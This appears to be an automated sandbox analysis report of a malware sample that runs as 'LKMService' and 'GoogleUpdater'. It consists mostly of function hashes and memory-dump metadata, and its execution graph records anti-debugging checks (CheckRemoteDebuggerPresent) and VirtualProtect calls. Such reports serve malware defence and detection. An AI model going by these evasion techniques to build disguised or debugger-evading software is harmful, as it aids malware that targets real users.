                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 826be42d79bf5e3ee4c2bdc19bde9e9c39fab20ad843fd38c8e8d10017823616
                                                                                                                                                                                                                                            • Instruction ID: 236940c3673d1e8211e5fc9ab18c938a3dbad11c7801257f73cd64027c93aaa6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 826be42d79bf5e3ee4c2bdc19bde9e9c39fab20ad843fd38c8e8d10017823616
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BD0C935A01119CFC714DB78C099469BBB5AB89218705482AE806AB3A4D732DC91DB40
                                                                                                                                                                                                                                            Function 058BA0F0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7cc375f0471965a98384aed94cef022cfaa49d5b2ea8669e67889a0fa0561695
                                                                                                                                                                                                                                            • Instruction ID: 41f79591172ae8039d365945abec6c3868d5b2e73dfbbdb3f03347dc5335f1b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cc375f0471965a98384aed94cef022cfaa49d5b2ea8669e67889a0fa0561695
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABC02BB7CD43450FCF008D10CAD11893724E79B320B2004E5C000C6002C13C4C098311
                                                                                                                                                                                                                                            Function 058B3051 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e5cdfa7fd2ca33b7f7243d131df9c7696952b8caae871fd9023bf18d3b9b1612
                                                                                                                                                                                                                                            • Instruction ID: f32832d092e5b2a1704f664622f437ad3061c7d9c077401fdb624c817d5a4076
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5cdfa7fd2ca33b7f7243d131df9c7696952b8caae871fd9023bf18d3b9b1612
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3C08C31C0E381CFC3038B308400084BBB1BD5211038806EAC0498E023F33EC944CBC1
                                                                                                                                                                                                                                            Function 058B1237 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 67f081edf59da1a9ee05d62e64ed7e3c7ca18c65b82dbf52ae6706661d3b0c20
                                                                                                                                                                                                                                            • Instruction ID: b6d668d2037c488f2d963213de862d0d784298ea0fb9db84bc4fe952b797e8ff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67f081edf59da1a9ee05d62e64ed7e3c7ca18c65b82dbf52ae6706661d3b0c20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEC09B5170418F8AE700D258C55476BE6DE5B54314F5400559B06EB3C4D6B94D059737
                                                                                                                                                                                                                                            Function 058B1479 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8e861858ef16266e43bc07d4147f7406122bfb738f7f9094b15c140ef69e1adb
                                                                                                                                                                                                                                            • Instruction ID: 2e1292ab183af2630991eeed0b65e47f5c451c58bcb89f1857a362b19f30a72d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e861858ef16266e43bc07d4147f7406122bfb738f7f9094b15c140ef69e1adb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FC09B61A0014E87DB40D684C554BAFF26D5748304F90C0199B45EB784DA785D0ADB36
                                                                                                                                                                                                                                            Function 058B1B91 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d58e8cec06fc23949723d21dbf6c204a5823b1e27ea1a27e51e57e2018edb429
                                                                                                                                                                                                                                            • Instruction ID: 1aa486f9619b8035f0d727e0ad65594d373d8eedb99603505d82e8cf8df9b1d7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d58e8cec06fc23949723d21dbf6c204a5823b1e27ea1a27e51e57e2018edb429
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59C04C3190500ECBDB14D6D4C594BAFF3799B48204F5580199B16E7345D6215C01DF55
                                                                                                                                                                                                                                            Function 058B13E1 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ee949f45ea93f97400434e41f759ac22038e2c6a9703cb0857cdf5c1f87ac3d2
                                                                                                                                                                                                                                            • Instruction ID: 64bb3e32840d5041c5f7a311ac19fca0c95d9d622fa6018fded3e4772a521d10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee949f45ea93f97400434e41f759ac22038e2c6a9703cb0857cdf5c1f87ac3d2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26C08C20A1010DC79640D2A8C589A6FA22A9B98200F0040028509E7340DA248D00C629
                                                                                                                                                                                                                                            Function 058B0B0F Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bb247944ffd8ef135654d595a26c5f4c62d2803a36b58e588f6a603da6e30690
                                                                                                                                                                                                                                            • Instruction ID: 7210150adbd2793b97124856d47ea80d714b6941815a1d118af5d41848e9a3c2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb247944ffd8ef135654d595a26c5f4c62d2803a36b58e588f6a603da6e30690
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04C02B2071104E45C200D174850971BC18F4BD0200F0000030A02D33A0D4608D409129
                                                                                                                                                                                                                                            Function 058B3320 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 016e5c68ebd6180ed38385f1250a20579140b353556b3364db550c57800b3eaf
                                                                                                                                                                                                                                            • Instruction ID: 8a10ad328598a1f9ac589a44856f6b72eada7bcbc3c71a43ce67f8574cfbacc3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 016e5c68ebd6180ed38385f1250a20579140b353556b3364db550c57800b3eaf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9B092BAD43300CFD7971A30CC0834033F0BFA222AFA80498C4010C060A23E840A8A04
                                                                                                                                                                                                                                            Function 058B0EB5 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 91edd63594f140e6904893c50dbd015802c821af800ddf2d8d124ec928a315ee
                                                                                                                                                                                                                                            • Instruction ID: cfbda6f60fa674e1d66bc71003f7ba32483edc742629b1caa7a1629db00a6a08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91edd63594f140e6904893c50dbd015802c821af800ddf2d8d124ec928a315ee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28B0121070014E97DB44D38CC10876FD1DFDBE4104F9880165586D7344DC518C059B22
                                                                                                                                                                                                                                            Function 058B39A0 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9bace94947fe5b100c521703285b7ef3f7c3d31c6604bfdbbfed3d5bd3f2ec0b
                                                                                                                                                                                                                                            • Instruction ID: a9bc9cbef3621cd07c143eb397b32bd8225441f5f374c5cb61af8cca2c050a1c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bace94947fe5b100c521703285b7ef3f7c3d31c6604bfdbbfed3d5bd3f2ec0b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95B002F79327514BEB452660C4117C437D0FF77669FE21C85C0044815596661D07CA11
                                                                                                                                                                                                                                            Function 058B6923 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 648aa7d65e76471480c9a2fbaae4a73cb3bd948ae8c8ac9a87e686f0b6c24372
                                                                                                                                                                                                                                            • Instruction ID: eb48f430c3c3a31f2a1ff935fc2ed82d509c5f422a194477b39d3c60d6905f5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 648aa7d65e76471480c9a2fbaae4a73cb3bd948ae8c8ac9a87e686f0b6c24372
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8C09B738052459D67514F71590D0C57E75966730037590A6C402D6511D2508E048755
                                                                                                                                                                                                                                            Function 058B6FD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cec637016a684409052a7969c35341f0370a513bc31db51dd4c044c13e60daeb
                                                                                                                                                                                                                                            • Instruction ID: c08574e9ecbb7e3267180df6eabec8382b494cdc16a15d3ec7be1224b7c389ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cec637016a684409052a7969c35341f0370a513bc31db51dd4c044c13e60daeb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94A0022415115566D658F614D9A14B5761AFA8211C3D4A098844B4B661CA56DC828690

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:16.4%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:55
                                                                                                                                                                                                                                            Total number of Limit Nodes:5
                                                                                                                                                                                                                                            execution_graph 4647 ec0848 4648 ec085c 4647->4648 4653 ec0e8d 4647->4653 4657 ec08e0 4647->4657 4662 ec0f29 4647->4662 4667 ec0e2e 4647->4667 4655 ec0e9c 4653->4655 4654 ec13dc CheckRemoteDebuggerPresent 4656 ec141e 4654->4656 4655->4654 4656->4648 4658 ec0919 4657->4658 4659 ec13dc CheckRemoteDebuggerPresent 4658->4659 4660 ec094d 4658->4660 4661 ec141e 4659->4661 4660->4648 4661->4648 4663 ec0f2e 4662->4663 4664 ec0eb7 4662->4664 4665 ec13dc CheckRemoteDebuggerPresent 4664->4665 4666 ec141e 4665->4666 4666->4648 4668 ec0e9b 4667->4668 4669 ec13dc CheckRemoteDebuggerPresent 4668->4669 4670 ec141e 4669->4670 4670->4648 4671 ec1478 4672 ec14c0 VirtualProtect 4671->4672 4673 ec14fa 4672->4673 4674 ecbf78 4678 ecbf8c 4674->4678 4675 ecbfe5 4678->4675 4685 6861237 4678->4685 4690 6861479 4678->4690 4693 68612ab 4678->4693 4697 6860b0f 4678->4697 4700 68613e1 4678->4700 4703 6861b91 4678->4703 4706 6861203 4678->4706 4709 6860eb5 4678->4709 4686 686123b 4685->4686 4712 ec6c08 4685->4712 4687 68612b2 4686->4687 4689 ec6c08 VirtualProtect 4686->4689 4689->4686 4692 ec6c08 VirtualProtect 4690->4692 4691 686148c 4692->4691 4694 68612b2 4693->4694 4695 686123b 4693->4695 4695->4693 4696 ec6c08 VirtualProtect 4695->4696 4696->4695 4699 ec6c08 VirtualProtect 4697->4699 4698 6860b1f 4699->4698 4702 ec6c08 VirtualProtect 4700->4702 4701 68613f2 4702->4701 4705 ec6c08 VirtualProtect 4703->4705 4704 6861ba5 4705->4704 4708 ec6c08 VirtualProtect 4706->4708 4707 6861217 4708->4707 4711 ec6c08 VirtualProtect 4709->4711 4710 6860ec5 4711->4710 4713 ec6c50 VirtualProtect 4712->4713 4714 ec6c8a 4713->4714 4714->4686

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 06863E9B Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: U>
                                                                                                                                                                                                                                            • API String ID: 0-1377227503
                                                                                                                                                                                                                                            • Opcode ID: 0340ccbfa196e7bea2f78712ed23d882d988da88bc3f62e0868821f8e9ac38d6
                                                                                                                                                                                                                                            • Instruction ID: 4bbeacee8e361a8c08f962e58eb4710cee2bc021dfe63d295f100fe04a7d9343
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0340ccbfa196e7bea2f78712ed23d882d988da88bc3f62e0868821f8e9ac38d6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8271F171A04209CFEB45CF69C5819DDBBF2BF89228F199192E405FB366C631DD42CBA1
                                                                                                                                                                                                                                            Function 06864290 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: iT;q
                                                                                                                                                                                                                                            • API String ID: 0-393170795
                                                                                                                                                                                                                                            • Opcode ID: 51e07ced675fc87857d4e4b11ac8c9f99604dfa31c2b84d476f166f27038637f
                                                                                                                                                                                                                                            • Instruction ID: a53e1a316ee0795949e8dcbad49f6be371401344b58543d3c9ba1bd478ca4b52
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e07ced675fc87857d4e4b11ac8c9f99604dfa31c2b84d476f166f27038637f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC5158317042498FE7A4CFBAC44169EBBF3AF89204F28895AF446DB385DB30DD158761
                                                                                                                                                                                                                                            Function 068642A0 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: iT;q
                                                                                                                                                                                                                                            • API String ID: 0-393170795
                                                                                                                                                                                                                                            • Opcode ID: d71e37841539f8f0533c8be1c082976a1dc996a3d994a28a08eb9c62f8166efe
                                                                                                                                                                                                                                            • Instruction ID: 1e8668e2d5d2f13af4d7806ee575dc682b231ba54b36320d3cf199ea4e5aad6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d71e37841539f8f0533c8be1c082976a1dc996a3d994a28a08eb9c62f8166efe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A5148307042498FE7A4CFBAC44169EBBF3AF89204F28895AF546DB384DB30DD158761
                                                                                                                                                                                                                                            Function 06862149 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ff75f46f86f4724e540c68eafaf2372c0d1c5bc38f7ab4581203140a8f93bb80
                                                                                                                                                                                                                                            • Instruction ID: 74a2103656f7139154bd18e778f22641d9e01f4d1d28452d0919feeb9ed8bcc6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff75f46f86f4724e540c68eafaf2372c0d1c5bc38f7ab4581203140a8f93bb80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16515A307093818FD7568B79882576FBFB6AFCA240B1548AEE582DB396CE3489058791
                                                                                                                                                                                                                                            Function 068621FB Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a522a2506da641eabc89f007807ba4347338d85aa77f58d0657d2eb56598b6d2
                                                                                                                                                                                                                                            • Instruction ID: d54cda4e248c46b80a105cd9690bd6ffbe133c247a2914158a7f690f23f6641f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a522a2506da641eabc89f007807ba4347338d85aa77f58d0657d2eb56598b6d2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6514830B04245CFD754CB7A996976FBBB3BFC9240F14446AE506EB395CE34CA068791
                                                                                                                                                                                                                                            Function 06862240 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1d0f48c610e27b486ad430718e52c80520c12e585b82cb1564c801708a17a410
                                                                                                                                                                                                                                            • Instruction ID: 5113c0f90e3f17ca02d91ef5c9e0d44415b6625574f01cf4a7031c5def0eea86
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d0f48c610e27b486ad430718e52c80520c12e585b82cb1564c801708a17a410
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A41E530B00205CFD758DB7A996972FBAE7BFC8640F248429E506EB394DE74CE068791
                                                                                                                                                                                                                                            Function 00EC08E0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 57 ec08e0-ec093b 61 ec095d-ec0962 57->61 62 ec093d-ec0947 57->62 65 ec0965-ec0997 61->65 63 ec094d-ec095b 62->63 64 ec1283-ec141c CheckRemoteDebuggerPresent 62->64 63->65 70 ec141e-ec1424 64->70 71 ec1425-ec1460 64->71 73 ec099d 65->73 74 ec127b-ec1282 65->74 70->71 73->74
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: J
                                                                                                                                                                                                                                            • API String ID: 0-3956618759
                                                                                                                                                                                                                                            • Opcode ID: f8dfcad3508f0e07dbe067f6f86fd57e9366748c25999fe083edbe9cae1c61f4
                                                                                                                                                                                                                                            • Instruction ID: fbe4d3943702f07322ffe5e48df9b98e6e83a02da8db68df91bdcb06f95cb21a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8dfcad3508f0e07dbe067f6f86fd57e9366748c25999fe083edbe9cae1c61f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E191E83094D3C58FCB11CFA988646D9BFB1AF56210F1886AFC485D7A93D63E850BCB52
                                                                                                                                                                                                                                            Function 00EC0E8D Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 166 ec0e8d-ec0e96 167 ec0e9c-ec0ed0 call ec059c 166->167 168 ec1283-ec141c CheckRemoteDebuggerPresent 166->168 173 ec0ed5-ec0edf call ec05ac 167->173 174 ec141e-ec1424 168->174 175 ec1425-ec1460 168->175 173->168 174->175
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8789e1424572e8d52fbf9877f5956a07e9c9f00527a4076fb54daa2a620da07d
                                                                                                                                                                                                                                            • Instruction ID: 00ff60c92aa791b5eb3e7bd91a6fa05dae938a6ade8bb6beb12bdf59b100af1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8789e1424572e8d52fbf9877f5956a07e9c9f00527a4076fb54daa2a620da07d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D71EA3084D7C58FCB12CFA8C8659D9BFB19F16210F18869FC481E7A43D62E950BCB56
                                                                                                                                                                                                                                            Function 00EC1161 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
